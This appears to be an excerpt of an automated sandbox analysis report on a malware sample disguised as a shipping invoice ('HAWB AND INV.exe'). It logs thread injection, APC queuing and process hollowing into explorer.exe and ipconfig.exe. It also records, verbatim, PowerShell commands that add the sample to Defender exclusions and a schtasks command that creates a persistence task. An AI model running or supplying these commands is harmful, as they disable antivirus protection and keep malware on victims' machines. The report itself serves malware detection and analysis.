          Source: C:\Users\user\Desktop\HAWB AND INV.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\HAWB AND INV.exeSection loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\HAWB AND INV.exeSection loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\HAWB AND INV.exeThread register set: target process: 3440
          Source: C:\Windows\SysWOW64\ipconfig.exeThread register set: target process: 3440
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\HAWB AND INV.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\HAWB AND INV.exeSection unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: AA0000
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HAWB AND INV.exe'Jump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe'Jump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\qxnptkmQbHB' /XML 'C:\Users\user\AppData\Local\Temp\tmp9D41.tmp'Jump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe'Jump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess created: C:\Users\user\Desktop\HAWB AND INV.exe C:\Users\user\Desktop\HAWB AND INV.exeJump to behavior
          Source: explorer.exe, 0000000B.00000000.410165765.00000000083EB000.00000004.00000001.sdmp, ipconfig.exe, 00000017.00000002.598358599.0000000005100000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 0000000B.00000002.593443753.00000000008B8000.00000004.00000020.sdmp, ipconfig.exe, 00000017.00000002.598358599.0000000005100000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 0000000B.00000002.596560849.0000000000EE0000.00000002.00000001.sdmp, ipconfig.exe, 00000017.00000002.598358599.0000000005100000.00000002.00000001.sdmpBinary or memory string: &Program Manager
          Source: explorer.exe, 0000000B.00000002.596560849.0000000000EE0000.00000002.00000001.sdmp, ipconfig.exe, 00000017.00000002.598358599.0000000005100000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\HAWB AND INV.exeQueries volume information: C:\Users\user\Desktop\HAWB AND INV.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
